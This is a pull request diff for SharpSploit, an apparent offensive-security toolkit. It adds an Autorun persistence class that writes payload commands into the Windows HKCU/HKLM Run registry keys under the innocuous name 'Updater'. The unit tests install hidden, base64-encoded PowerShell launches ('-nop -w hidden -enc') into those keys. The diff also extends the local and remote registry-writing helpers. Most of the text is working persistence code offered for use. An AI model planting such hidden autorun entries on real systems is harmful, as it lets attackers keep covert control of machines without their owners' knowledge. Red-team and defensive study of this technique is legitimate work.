### PR TITLE
Adds Registry HKCU/HKLM Autorun Persistence

### DIFF
--- a/SharpSploit.Tests/SharpSploit.Tests/Persistence/AutorunTests.cs
+++ b/SharpSploit.Tests/SharpSploit.Tests/Persistence/AutorunTests.cs
@@ -1,0 +1,37 @@
+﻿// Author: Ryan Cobb (@cobbr_io)
+// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
+// License: BSD 3-Clause
+
+using System;
+using System.Linq;
+using Microsoft.Win32;
+using Microsoft.VisualStudio.TestTools.UnitTesting;
+
+using SharpSploit.Persistence;
+
+namespace SharpSploit.Tests.Persistence
+{
+    [TestClass]
+    public class AutorunTests
+    {
+        [TestMethod]
+        public void InstallHKCUAutorun()
+        {
+            string cmd = Convert.ToBase64String(System.Text.Encoding.Unicode.GetBytes(@"New-Item -Path C:\Temp\hkcu.txt -ItemType File"));
+            Autorun.InstallAutorun($@"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -nop -w hidden -enc {cmd}", Autorun.Hive.HKCU);
+
+            RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", false);
+            Assert.IsTrue(key.GetValueNames().Contains("Updater"));
+        }
+
+        [TestMethod]
+        public void InstallHKLMAutorun()
+        {
+            string cmd = Convert.ToBase64String(System.Text.Encoding.Unicode.GetBytes(@"New-Item -Path C:\Temp\hklm.txt -ItemType File"));
+            Autorun.InstallAutorun($@"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -nop -w hidden -enc {cmd}", Autorun.Hive.HKLM);
+
+            RegistryKey key = Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", false);
+            Assert.IsTrue(key.GetValueNames().Contains("Updater"));
+        }
+    }
+}

--- a/SharpSploit.Tests/SharpSploit.Tests/Persistence/AutorunTests.cs
+++ b/SharpSploit.Tests/SharpSploit.Tests/Persistence/AutorunTests.cs
@@ -3,10 +3,10 @@
 // License: BSD 3-Clause
 
 using System;
-using System.Linq;
-using Microsoft.Win32;
+using Win = Microsoft.Win32;
 using Microsoft.VisualStudio.TestTools.UnitTesting;
 
+using SharpSploit.Enumeration;
 using SharpSploit.Persistence;
 
 namespace SharpSploit.Tests.Persistence
@@ -18,20 +18,22 @@ namespace SharpSploit.Tests.Persistence
         public void InstallHKCUAutorun()
         {
             string cmd = Convert.ToBase64String(System.Text.Encoding.Unicode.GetBytes(@"New-Item -Path C:\Temp\hkcu.txt -ItemType File"));
-            Autorun.InstallAutorun($@"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -nop -w hidden -enc {cmd}", Autorun.Hive.HKCU);
+            string valueExpected = $@"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -nop -w hidden -enc {cmd}";
+            Autorun.InstallAutorun(Win.RegistryHive.CurrentUser, valueExpected);
 
-            RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", false);
-            Assert.IsTrue(key.GetValueNames().Contains("Updater"));
+            string result = Registry.GetRegistryKey(Win.RegistryHive.CurrentUser, @"Software\Microsoft\Windows\CurrentVersion\Run", "Updater");
+            Assert.IsTrue(result.Contains(valueExpected));
         }
 
         [TestMethod]
         public void InstallHKLMAutorun()
         {
-            string cmd = Convert.ToBase64String(System.Text.Encoding.Unicode.GetBytes(@"New-Item -Path C:\Temp\hklm.txt -ItemType File"));
-            Autorun.InstallAutorun($@"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -nop -w hidden -enc {cmd}", Autorun.Hive.HKLM);
+            string cmd = Convert.ToBase64String(System.Text.Encoding.Unicode.GetBytes(@"New-Item -Path C:\Temp\hkcu.txt -ItemType File"));
+            string valueExpected = $@"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -nop -w hidden -enc {cmd}";
+            Autorun.InstallAutorun(Win.RegistryHive.LocalMachine, valueExpected);
 
-            RegistryKey key = Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", false);
-            Assert.IsTrue(key.GetValueNames().Contains("Updater"));
+            string result = Registry.GetRegistryKey(Win.RegistryHive.LocalMachine, @"Software\Microsoft\Windows\CurrentVersion\Run", "Updater");
+            Assert.IsTrue(result.Contains(valueExpected));
         }
     }
 }

--- a/SharpSploit.Tests/SharpSploit.Tests/SharpSploit.Tests.csproj
+++ b/SharpSploit.Tests/SharpSploit.Tests/SharpSploit.Tests.csproj
@@ -63,6 +63,7 @@
     <Compile Include="Execution\ShellTests.cs" />
     <Compile Include="LateralMovement\DCOMTests.cs" />
     <Compile Include="LateralMovement\WMITests.cs" />
+    <Compile Include="Persistence\AutorunTests.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
   </ItemGroup>
   <ItemGroup>

--- a/SharpSploit/Enumeration/Registry.cs
+++ b/SharpSploit/Enumeration/Registry.cs
@@ -160,8 +160,9 @@ namespace SharpSploit.Enumeration
         /// </summary>
         /// <param name="RegHiveKeyValue">The path to the registry key to set, including: hive, subkey, and value name.</param>
         /// <param name="Value">The value to write to the registry key.</param>
+        /// <param name="ValueKind">The kind of value to write to the registry key.</param>
         /// <returns>True if succeeded, false otherwise.</returns>
-        public static bool SetRegistryKey(string RegHiveKeyValue, object Value)
+        public static bool SetRegistryKey(string RegHiveKeyValue, object Value, Win.RegistryValueKind ValueKind = Win.RegistryValueKind.String)
         {
             string[] pieces = RegHiveKeyValue.Split(Path.DirectorySeparatorChar);
             if (!pieces.Any()) { return false; }
@@ -170,7 +171,7 @@ namespace SharpSploit.Enumeration
             {
                 RegHiveKey = pieces[i] + Path.DirectorySeparatorChar;
             }
-            return SetRegistryKey(ConvertToRegistryHive(pieces.First()), RegHiveKey.Trim(Path.DirectorySeparatorChar), pieces[pieces.Length - 1], Value);
+            return SetRegistryKey(ConvertToRegistryHive(pieces.First()), RegHiveKey.Trim(Path.DirectorySeparatorChar), pieces[pieces.Length - 1], Value, ValueKind);
         }
 
         /// <summary>
@@ -179,8 +180,9 @@ namespace SharpSploit.Enumeration
         /// <param name="RegHiveKey">The path to the registry key to set, including: hive and subkey.</param>
         /// <param name="RegValue">The name of the RegistryKey to set.</param>
         /// <param name="Value">The value to write to the registry key.</param>
+        /// <param name="ValueKind">The kind of value to write to the registry key.</param>
         /// <returns>True if succeeded, false otherwise.</returns>
-        public static bool SetRegistryKey(string RegHiveKey, string RegValue, object Value)
+        public static bool SetRegistryKey(string RegHiveKey, string RegValue, object Value, Win.RegistryValueKind ValueKind = Win.RegistryValueKind.String)
         {
             string[] pieces = RegHiveKey.Split(Path.DirectorySeparatorChar);
             if (!pieces.Any()) { return false; }
@@ -189,7 +191,7 @@ namespace SharpSploit.Enumeration
             {
                 RegKey = pieces[i] + Path.DirectorySeparatorChar;
             }
-            return SetRegistryKey(ConvertToRegistryHive(pieces.First()), RegKey.Trim(Path.DirectorySeparatorChar), RegValue, Value);
+            return SetRegistryKey(ConvertToRegistryHive(pieces.First()), RegKey.Trim(Path.DirectorySeparatorChar), RegValue, Value, ValueKind);
         }
 
         /// <summary>
@@ -199,10 +201,11 @@ namespace SharpSploit.Enumeration
         /// <param name="RegKey">The RegistryKey to set, including the hive.</param>
         /// <param name="RegValue">The name of name/value pair to write to in the RegistryKey.</param>
         /// <param name="Value">The value to write to the registry key.</param>
+        /// <param name="ValueKind">The kind of value to write to the registry key.</param>
         /// <returns>True if succeeded, false otherwise.</returns>
-        public static bool SetRegistryKey(string RegHive, string RegKey, string RegValue, object Value)
+        public static bool SetRegistryKey(string RegHive, string RegKey, string RegValue, object Value, Win.RegistryValueKind ValueKind = Win.RegistryValueKind.String)
         {
-            return SetRegistryKey(ConvertToRegistryHive(RegHive), RegKey, RegValue, Value);
+            return SetRegistryKey(ConvertToRegistryHive(RegHive), RegKey, RegValue, Value, ValueKind);
         }
 
         /// <summary>
@@ -212,8 +215,9 @@ namespace SharpSploit.Enumeration
         /// <param name="RegKey">The RegistryKey to set, including the hive.</param>
         /// <param name="RegValue">The name of name/value pair to write to in the RegistryKey.</param>
         /// <param name="Value">The value to write to the registry key.</param>
+        /// <param name="ValueKind">The kind of value to write to the registry key.</param>
         /// <returns>True if succeeded, false otherwise.</returns>
-        public static bool SetRegistryKey(Win.RegistryHive RegHive, string RegKey, string RegValue, object Value)
+        public static bool SetRegistryKey(Win.RegistryHive RegHive, string RegKey, string RegValue, object Value, Win.RegistryValueKind ValueKind = Win.RegistryValueKind.String)
         {
             Win.RegistryKey baseKey = null;
             switch (RegHive)
@@ -250,7 +254,7 @@ namespace SharpSploit.Enumeration
                     baseKey = baseKey.OpenSubKey(pieces[i], true);
                 }
             }
-            return SetRegistryKeyValue(baseKey, RegValue, Value);
+            return SetRegistryKeyValue(baseKey, RegValue, Value, ValueKind);
         }
 
         /// <summary>
@@ -259,12 +263,13 @@ namespace SharpSploit.Enumeration
         /// <param name="RegHiveKey">The RegistryKey to set.</param>
         /// <param name="RegValue">The name of name/value pair to write to in the RegistryKey.</param>
         /// <param name="Value">The value to write to the registry key.</param>
+        /// <param name="ValueKind">The kind of value to write to the registry key.</param>
         /// <returns>True if succeeded, false otherwise.</returns>
-        private static bool SetRegistryKeyValue(Win.RegistryKey RegHiveKey, string RegValue, object Value)
+        private static bool SetRegistryKeyValue(Win.RegistryKey RegHiveKey, string RegValue, object Value, Win.RegistryValueKind ValueKind = Win.RegistryValueKind.String)
         {
             try
             {
-                RegHiveKey.SetValue(RegValue, Value);
+                RegHiveKey.SetValue(RegValue, Value, ValueKind);
                 return true;
             }
             catch (Exception e)
@@ -405,8 +410,9 @@ namespace SharpSploit.Enumeration
         /// <param name="Hostname">Remote hostname to connect to for remote registry.</param>
         /// <param name="RegHiveKeyValue">The path to the registry key to set, including: hive, subkey, and value name.</param>
         /// <param name="Value">The value to write to the registry key.</param>
+        /// <param name="ValueKind">The kind of value to write to the registry key.</param>
         /// <returns>True if succeeded, false otherwise.</returns>
-        public static bool SetRemoteRegistryKey(string Hostname, string RegHiveKeyValue, object Value)
+        public static bool SetRemoteRegistryKey(string Hostname, string RegHiveKeyValue, object Value, Win.RegistryValueKind ValueKind = Win.RegistryValueKind.String)
         {
             string[] pieces = RegHiveKeyValue.Split(Path.DirectorySeparatorChar);
             if (!pieces.Any()) { return false; }
@@ -415,7 +421,7 @@ namespace SharpSploit.Enumeration
             {
                 RegHiveKey = pieces[i] + Path.DirectorySeparatorChar;
             }
-            return SetRemoteRegistryKey(Hostname, ConvertToRegistryHive(pieces.First()), RegHiveKey.Trim(Path.DirectorySeparatorChar), pieces[pieces.Length - 1], Value);
+            return SetRemoteRegistryKey(Hostname, ConvertToRegistryHive(pieces.First()), RegHiveKey.Trim(Path.DirectorySeparatorChar), pieces[pieces.Length - 1], Value, ValueKind);
         }
 
         /// <summary>
@@ -425,8 +431,9 @@ namespace SharpSploit.Enumeration
         /// <param name="RegHiveKey">The path to the registry key to set, including: hive and subkey.</param>
         /// <param name="RegValue">The name of the RegistryKey to set.</param>
         /// <param name="Value">The value to write to the registry key.</param>
+        /// <param name="ValueKind">The kind of value to write to the registry key.</param>
         /// <returns>True if succeeded, false otherwise.</returns>
-        public static bool SetRemoteRegistryKey(string Hostname, string RegHiveKey, string RegValue, object Value)
+        public static bool SetRemoteRegistryKey(string Hostname, string RegHiveKey, string RegValue, object Value, Win.RegistryValueKind ValueKind = Win.RegistryValueKind.String)
         {
             string[] pieces = RegHiveKey.Split(Path.DirectorySeparatorChar);
             if (!pieces.Any()) { return false; }
@@ -435,7 +442,7 @@ namespace SharpSploit.Enumeration
             {
                 RegKey = pieces[i] + Path.DirectorySeparatorChar;
             }
-            return SetRemoteRegistryKey(Hostname, ConvertToRegistryHive(pieces.First()), RegKey.Trim(Path.DirectorySeparatorChar), RegValue, Value);
+            return SetRemoteRegistryKey(Hostname, ConvertToRegistryHive(pieces.First()), RegKey.Trim(Path.DirectorySeparatorChar), RegValue, Value, ValueKind);
         }
 
         /// <summary>
@@ -446,10 +453,11 @@ namespace SharpSploit.Enumeration
         /// <param name="RegKey">The RegistryKey to set, including the hive.</param>
         /// <param name="RegValue">The name of name/value pair to write to in the RegistryKey.</param>
         /// <param name="Value">The value to write to the registry key.</param>
+        /// <param name="ValueKind">The kind of value to write to the registry key.</param>
         /// <returns>True if succeeded, false otherwise.</returns>
-        public static bool SetRemoteRegistryKey(string Hostname, string RegHive, string RegKey, string RegValue, object Value)
+        public static bool SetRemoteRegistryKey(string Hostname, string RegHive, string RegKey, string RegValue, object Value, Win.RegistryValueKind ValueKind = Win.RegistryValueKind.String)
         {
-            return SetRemoteRegistryKey(Hostname, ConvertToRegistryHive(RegHive), RegKey, RegValue, Value);
+            return SetRemoteRegistryKey(Hostname, ConvertToRegistryHive(RegHive), RegKey, RegValue, Value, ValueKind);
         }
 
         /// <summary>
@@ -460,8 +468,9 @@ namespace SharpSploit.Enumeration
         /// <param name="RegKey">The RegistryKey to set, including the hive.</param>
         /// <param name="RegValue">The name of name/value pair to write to in the RegistryKey.</param>
         /// <param name="Value">The value to write to the registry key.</param>
+        /// <param name="ValueKind">The kind of value to write to the registry key.</param>
         /// <returns>True if succeeded, false otherwise.</returns>
-        public static bool SetRemoteRegistryKey(string Hostname, Win.RegistryHive RegHive, string RegKey, string RegValue, object Value)
+        public static bool SetRemoteRegistryKey(string Hostname, Win.RegistryHive RegHive, string RegKey, string RegValue, object Value, Win.RegistryValueKind ValueKind = Win.RegistryValueKind.String)
         {
             Win.RegistryKey baseKey = null;
             switch (RegHive)
@@ -498,25 +507,30 @@ namespace SharpSploit.Enumeration
                     baseKey = baseKey.OpenSubKey(pieces[i], true);
                 }
             }
-            return SetRegistryKeyValue(baseKey, RegValue, Value);
+            return SetRegistryKeyValue(baseKey, RegValue, Value, ValueKind);
         }
         #endregion
 
-        private static Win.RegistryHive ConvertToRegistryHive(string RegHive)
+        /// <summary>
+        /// Convert a string to a Win32.RegistryHive.
+        /// </summary>
+        /// <param name="RegHive">RegHive value to convert to RegistryHive.</param>
+        /// <returns>Matching RegistryHive value, defaults to CurrentUser if none match.</returns>
+        public static Win.RegistryHive ConvertToRegistryHive(string RegHive)
         {
-            if (RegHive.Equals("HKEY_CURRENT_USER", StringComparison.OrdinalIgnoreCase) || RegHive.Equals("HKCU", StringComparison.OrdinalIgnoreCase))
+            if (RegHive.Equals("HKEY_CURRENT_USER", StringComparison.OrdinalIgnoreCase) || RegHive.Equals("HKCU", StringComparison.OrdinalIgnoreCase) || RegHive.Equals("CurrentUser", StringComparison.OrdinalIgnoreCase))
             {
                 return Win.RegistryHive.CurrentUser;
             }
-            if (RegHive.Equals("HKEY_LOCAL_MACHINE", StringComparison.OrdinalIgnoreCase) || RegHive.Equals("HKLM", StringComparison.OrdinalIgnoreCase))
+            if (RegHive.Equals("HKEY_LOCAL_MACHINE", StringComparison.OrdinalIgnoreCase) || RegHive.Equals("HKLM", StringComparison.OrdinalIgnoreCase) || RegHive.Equals("LocalMachine", StringComparison.OrdinalIgnoreCase))
             {
                 return Win.RegistryHive.LocalMachine;
             }
-            if (RegHive.Equals("HKEY_CLASSES_ROOT", StringComparison.OrdinalIgnoreCase) || RegHive.Equals("HKCR", StringComparison.OrdinalIgnoreCase))
+            if (RegHive.Equals("HKEY_CLASSES_ROOT", StringComparison.OrdinalIgnoreCase) || RegHive.Equals("HKCR", StringComparison.OrdinalIgnoreCase) || RegHive.Equals("ClassesRoot", StringComparison.OrdinalIgnoreCase))
             {
                 return Win.RegistryHive.ClassesRoot;
             }
-            if (RegHive.Equals("HKEY_CURRENT_CONFIG", StringComparison.OrdinalIgnoreCase) || RegHive.Equals("HKCC", StringComparison.OrdinalIgnoreCase))
+            if (RegHive.Equals("HKEY_CURRENT_CONFIG", StringComparison.OrdinalIgnoreCase) || RegHive.Equals("HKCC", StringComparison.OrdinalIgnoreCase) || RegHive.Equals("CurrentConfig", StringComparison.OrdinalIgnoreCase))
             {
                 return Win.RegistryHive.CurrentConfig;
             }
@@ -527,7 +541,12 @@ namespace SharpSploit.Enumeration
             return Win.RegistryHive.CurrentUser;
         }
 
-        private static string ConvertRegistryHiveToString(Win.RegistryHive RegHive)
+        /// <summary>
+        /// Convert Win32.RegistryHive to a string.
+        /// </summary>
+        /// <param name="RegHive">RegistryHive value to convert to string.</param>
+        /// <returns>Matching RegistryHive string, defaults to HKEY_CURRENT_USER if none match.</returns>
+        public static string ConvertRegistryHiveToString(Win.RegistryHive RegHive)
         {
             switch (RegHive)
             {

--- a/SharpSploit/Persistence/Autorun.cs
+++ b/SharpSploit/Persistence/Autorun.cs
@@ -3,7 +3,9 @@
 // License: BSD 3-Clause
 
 using System;
-using Microsoft.Win32;
+using Win = Microsoft.Win32;
+
+using SharpSploit.Enumeration;
 
 namespace SharpSploit.Persistence
 {
@@ -13,48 +15,41 @@ namespace SharpSploit.Persistence
     public class Autorun
     {
         /// <summary>
-        /// Creates an autorun value in HKCU or HKLM to execuate a payload.
+        /// Installs an autorun value in HKCU or HKLM to execute a payload.
         /// </summary>
         /// <author>Daniel Duggan (@_RastaMouse)</author>
-        /// <returns>Bool. True if execution succeeds, false otherwise.</returns>
+        /// <returns>True if execution succeeds, false otherwise.</returns>
+        /// <param name="TargetHive">Target hive to install autorun. CurrentUser or LocalMachine.</param>
+        /// <param name="Value">Value to set in the registry.</param>
         /// <param name="Name">Name for the registy value. Defaults to "Updater".</param>
-        /// <param name="Value">The registry value.</param>
-        /// <param name="TargetHive">The target hive. HKCU or HKLM.</param>
-        public static bool InstallAutorun(string Value, Hive TargetHive, string Name = "Updater")
+        public static bool InstallAutorun(Win.RegistryHive TargetHive, string Value, string Name = "Updater")
         {
             try
             {
-                RegistryKey key;
-
-                if (TargetHive == Hive.HKCU)
+                if (TargetHive == Win.RegistryHive.CurrentUser || TargetHive == Win.RegistryHive.LocalMachine)
                 {
-                    key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true);
-                    key.SetValue(Name, Value, RegistryValueKind.ExpandString);
-                    key.Close();
+                    return Registry.SetRegistryKey(TargetHive, @"Software\Microsoft\Windows\CurrentVersion\Run", Name, Value, Win.RegistryValueKind.ExpandString);
                 }
-                else if (TargetHive == Hive.HKLM)
-                {
-                    key = Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true);
-                    key.SetValue(Name, Value, RegistryValueKind.ExpandString);
-                    key.Close();
-                }
-
-                return true;
+                Console.Error.WriteLine("Error: TargetHive must be CurrentUser or LocalMachine.");
             }
-
             catch (Exception e)
             {
-                Console.Error.WriteLine("Error: ", e.Message);
+                Console.Error.WriteLine($"Error: {e.Message}");
             }
-
             return false;
-            
         }
 
-        public enum Hive
+        /// <summary>
+        /// Installs an autorun value in HKCU or HKLM to execute a payload.
+        /// </summary>
+        /// <author>Daniel Duggan (@_RastaMouse)</author>
+        /// <returns>True if execution succeeds, false otherwise.</returns>
+        /// <param name="TargetHive">Target hive to install autorun. CurrentUser or LocalMachine.</param>
+        /// <param name="Value">Value to set in the registry.</param>
+        /// <param name="Name">Name for the registy value. Defaults to "Updater".</param>
+        public static bool InstallAutorun(string TargetHive, string Value, string Name = "Updater")
         {
-            HKCU,
-            HKLM
+            return InstallAutorun(Registry.ConvertToRegistryHive(TargetHive), Value, Name);
         }
     }
 }

--- a/SharpSploit/Persistence/Autorun.cs
+++ b/SharpSploit/Persistence/Autorun.cs
@@ -1,0 +1,60 @@
+﻿// Author: Ryan Cobb (@cobbr_io)
+// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
+// License: BSD 3-Clause
+
+using System;
+using Microsoft.Win32;
+
+namespace SharpSploit.Persistence
+{
+    /// <summary>
+    /// Autorun is a class for abusing the Windows Registry to establish peristence.
+    /// </summary>
+    public class Autorun
+    {
+        /// <summary>
+        /// Creates an autorun value in HKCU or HKLM to execuate a payload.
+        /// </summary>
+        /// <author>Daniel Duggan (@_RastaMouse)</author>
+        /// <returns>Bool. True if execution succeeds, false otherwise.</returns>
+        /// <param name="Name">Name for the registy value. Defaults to "Updater".</param>
+        /// <param name="Value">The registry value.</param>
+        /// <param name="TargetHive">The target hive. HKCU or HKLM.</param>
+        public static bool InstallAutorun(string Value, Hive TargetHive, string Name = "Updater")
+        {
+            try
+            {
+                RegistryKey key;
+
+                if (TargetHive == Hive.HKCU)
+                {
+                    key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true);
+                    key.SetValue(Name, Value, RegistryValueKind.ExpandString);
+                    key.Close();
+                }
+                else if (TargetHive == Hive.HKLM)
+                {
+                    key = Registry.LocalMachine.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run", true);
+                    key.SetValue(Name, Value, RegistryValueKind.ExpandString);
+                    key.Close();
+                }
+
+                return true;
+            }
+
+            catch (Exception e)
+            {
+                Console.Error.WriteLine("Error: ", e.Message);
+            }
+
+            return false;
+            
+        }
+
+        public enum Hive
+        {
+            HKCU,
+            HKLM
+        }
+    }
+}

--- a/SharpSploit/SharpSploit.xml
+++ b/SharpSploit/SharpSploit.xml
@@ -776,24 +776,26 @@
             <param name="RegValue">The name of name/value pair to read from in the RegistryKey.</param>
             <returns>Content of the value of the RegistryKey, cast as a string.</returns>
         </member>
-        <member name="M:SharpSploit.Enumeration.Registry.SetRegistryKey(System.String,System.Object)">
+        <member name="M:SharpSploit.Enumeration.Registry.SetRegistryKey(System.String,System.Object,Microsoft.Win32.RegistryValueKind)">
             <summary>
             Sets a value in the registry.
             </summary>
             <param name="RegHiveKeyValue">The path to the registry key to set, including: hive, subkey, and value name.</param>
             <param name="Value">The value to write to the registry key.</param>
+            <param name="ValueKind">The kind of value to write to the registry key.</param>
             <returns>True if succeeded, false otherwise.</returns>
         </member>
-        <member name="M:SharpSploit.Enumeration.Registry.SetRegistryKey(System.String,System.String,System.Object)">
+        <member name="M:SharpSploit.Enumeration.Registry.SetRegistryKey(System.String,System.String,System.Object,Microsoft.Win32.RegistryValueKind)">
             <summary>
             Sets a value in the registry.
             </summary>
             <param name="RegHiveKey">The path to the registry key to set, including: hive and subkey.</param>
             <param name="RegValue">The name of the RegistryKey to set.</param>
             <param name="Value">The value to write to the registry key.</param>
+            <param name="ValueKind">The kind of value to write to the registry key.</param>
             <returns>True if succeeded, false otherwise.</returns>
         </member>
-        <member name="M:SharpSploit.Enumeration.Registry.SetRegistryKey(System.String,System.String,System.String,System.Object)">
+        <member name="M:SharpSploit.Enumeration.Registry.SetRegistryKey(System.String,System.String,System.String,System.Object,Microsoft.Win32.RegistryValueKind)">
             <summary>
             Sets a value in the registry.
             </summary>
@@ -801,9 +803,10 @@
             <param name="RegKey">The RegistryKey to set, including the hive.</param>
             <param name="RegValue">The name of name/value pair to write to in the RegistryKey.</param>
             <param name="Value">The value to write to the registry key.</param>
+            <param name="ValueKind">The kind of value to write to the registry key.</param>
             <returns>True if succeeded, false otherwise.</returns>
         </member>
-        <member name="M:SharpSploit.Enumeration.Registry.SetRegistryKey(Microsoft.Win32.RegistryHive,System.String,System.String,System.Object)">
+        <member name="M:SharpSploit.Enumeration.Registry.SetRegistryKey(Microsoft.Win32.RegistryHive,System.String,System.String,System.Object,Microsoft.Win32.RegistryValueKind)">
             <summary>
             Sets a value in the registry.
             </summary>
@@ -811,15 +814,17 @@
             <param name="RegKey">The RegistryKey to set, including the hive.</param>
             <param name="RegValue">The name of name/value pair to write to in the RegistryKey.</param>
             <param name="Value">The value to write to the registry key.</param>
+            <param name="ValueKind">The kind of value to write to the registry key.</param>
             <returns>True if succeeded, false otherwise.</returns>
         </member>
-        <member name="M:SharpSploit.Enumeration.Registry.SetRegistryKeyValue(Microsoft.Win32.RegistryKey,System.String,System.Object)">
+        <member name="M:SharpSploit.Enumeration.Registry.SetRegistryKeyValue(Microsoft.Win32.RegistryKey,System.String,System.Object,Microsoft.Win32.RegistryValueKind)">
             <summary>
             Sets a value in the registry.
             </summary>
             <param name="RegHiveKey">The RegistryKey to set.</param>
             <param name="RegValue">The name of name/value pair to write to in the RegistryKey.</param>
             <param name="Value">The value to write to the registry key.</param>
+            <param name="ValueKind">The kind of value to write to the registry key.</param>
             <returns>True if succeeded, false otherwise.</returns>
         </member>
         <member name="M:SharpSploit.Enumeration.Registry.GetRemoteRegistryKey(System.String,System.String)">
@@ -859,16 +864,17 @@
             <param name="RegValue">The name of name/value pair to read from in the RegistryKey.</param>
             <returns>List of the entries of the RegistrySubKey or the RegistryValue, cast as a string.</returns>
         </member>
-        <member name="M:SharpSploit.Enumeration.Registry.SetRemoteRegistryKey(System.String,System.String,System.Object)">
+        <member name="M:SharpSploit.Enumeration.Registry.SetRemoteRegistryKey(System.String,System.String,System.Object,Microsoft.Win32.RegistryValueKind)">
             <summary>
             Sets a value in the registry.
             </summary>
             <param name="Hostname">Remote hostname to connect to for remote registry.</param>
             <param name="RegHiveKeyValue">The path to the registry key to set, including: hive, subkey, and value name.</param>
             <param name="Value">The value to write to the registry key.</param>
+            <param name="ValueKind">The kind of value to write to the registry key.</param>
             <returns>True if succeeded, false otherwise.</returns>
         </member>
-        <member name="M:SharpSploit.Enumeration.Registry.SetRemoteRegistryKey(System.String,System.String,System.String,System.Object)">
+        <member name="M:SharpSploit.Enumeration.Registry.SetRemoteRegistryKey(System.String,System.String,System.String,System.Object,Microsoft.Win32.RegistryValueKind)">
             <summary>
             Sets a value in the registry.
             </summary>
@@ -876,9 +882,10 @@
             <param name="RegHiveKey">The path to the registry key to set, including: hive and subkey.</param>
             <param name="RegValue">The name of the RegistryKey to set.</param>
             <param name="Value">The value to write to the registry key.</param>
+            <param name="ValueKind">The kind of value to write to the registry key.</param>
             <returns>True if succeeded, false otherwise.</returns>
         </member>
-        <member name="M:SharpSploit.Enumeration.Registry.SetRemoteRegistryKey(System.String,System.String,System.String,System.String,System.Object)">
+        <member name="M:SharpSploit.Enumeration.Registry.SetRemoteRegistryKey(System.String,System.String,System.String,System.String,System.Object,Microsoft.Win32.RegistryValueKind)">
             <summary>
             Sets a value in the registry.
             </summary>
@@ -887,9 +894,10 @@
             <param name="RegKey">The RegistryKey to set, including the hive.</param>
             <param name="RegValue">The name of name/value pair to write to in the RegistryKey.</param>
             <param name="Value">The value to write to the registry key.</param>
+            <param name="ValueKind">The kind of value to write to the registry key.</param>
             <returns>True if succeeded, false otherwise.</returns>
         </member>
-        <member name="M:SharpSploit.Enumeration.Registry.SetRemoteRegistryKey(System.String,Microsoft.Win32.RegistryHive,System.String,System.String,System.Object)">
+        <member name="M:SharpSploit.Enumeration.Registry.SetRemoteRegistryKey(System.String,Microsoft.Win32.RegistryHive,System.String,System.String,System.Object,Microsoft.Win32.RegistryValueKind)">
             <summary>
             Sets a value in the registry.
             </summary>
@@ -898,7 +906,22 @@
             <param name="RegKey">The RegistryKey to set, including the hive.</param>
             <param name="RegValue">The name of name/value pair to write to in the RegistryKey.</param>
             <param name="Value">The value to write to the registry key.</param>
+            <param name="ValueKind">The kind of value to write to the registry key.</param>
             <returns>True if succeeded, false otherwise.</returns>
+        </member>
+        <member name="M:SharpSploit.Enumeration.Registry.ConvertToRegistryHive(System.String)">
+            <summary>
+            Convert a string to a Win32.RegistryHive.
+            </summary>
+            <param name="RegHive">RegHive value to convert to RegistryHive.</param>
+            <returns>Matching RegistryHive value, defaults to CurrentUser if none match.</returns>
+        </member>
+        <member name="M:SharpSploit.Enumeration.Registry.ConvertRegistryHiveToString(Microsoft.Win32.RegistryHive)">
+            <summary>
+            Convert Win32.RegistryHive to a string.
+            </summary>
+            <param name="RegHive">RegistryHive value to convert to string.</param>
+            <returns>Matching RegistryHive string, defaults to HKEY_CURRENT_USER if none match.</returns>
         </member>
         <member name="T:SharpSploit.Execution.Assembly">
             <summary>
@@ -1177,15 +1200,25 @@
             Autorun is a class for abusing the Windows Registry to establish peristence.
             </summary>
         </member>
-        <member name="M:SharpSploit.Persistence.Autorun.InstallAutorun(System.String,SharpSploit.Persistence.Autorun.Hive,System.String)">
+        <member name="M:SharpSploit.Persistence.Autorun.InstallAutorun(Microsoft.Win32.RegistryHive,System.String,System.String)">
             <summary>
-            Creates an autorun value in HKCU or HKLM to execuate a payload.
+            Installs an autorun value in HKCU or HKLM to execute a payload.
             </summary>
             <author>Daniel Duggan (@_RastaMouse)</author>
-            <returns>Bool. True if execution succeeds, false otherwise.</returns>
+            <returns>True if execution succeeds, false otherwise.</returns>
+            <param name="TargetHive">Target hive to install autorun. CurrentUser or LocalMachine.</param>
+            <param name="Value">Value to set in the registry.</param>
             <param name="Name">Name for the registy value. Defaults to "Updater".</param>
-            <param name="Value">The registry value.</param>
-            <param name="TargetHive">The target hive. HKCU or HKLM.</param>
+        </member>
+        <member name="M:SharpSploit.Persistence.Autorun.InstallAutorun(System.String,System.String,System.String)">
+            <summary>
+            Installs an autorun value in HKCU or HKLM to execute a payload.
+            </summary>
+            <author>Daniel Duggan (@_RastaMouse)</author>
+            <returns>True if execution succeeds, false otherwise.</returns>
+            <param name="TargetHive">Target hive to install autorun. CurrentUser or LocalMachine.</param>
+            <param name="Value">Value to set in the registry.</param>
+            <param name="Name">Name for the registy value. Defaults to "Updater".</param>
         </member>
         <member name="T:SharpSploit.Persistence.COM">
             <summary>

--- a/SharpSploit/SharpSploit.xml
+++ b/SharpSploit/SharpSploit.xml
@@ -1172,6 +1172,21 @@
             Adapted from https://stackoverflow.com/questions/6790499
             </remarks>
         </member>
+        <member name="T:SharpSploit.Persistence.Autorun">
+            <summary>
+            Autorun is a class for abusing the Windows Registry to establish peristence.
+            </summary>
+        </member>
+        <member name="M:SharpSploit.Persistence.Autorun.InstallAutorun(System.String,SharpSploit.Persistence.Autorun.Hive,System.String)">
+            <summary>
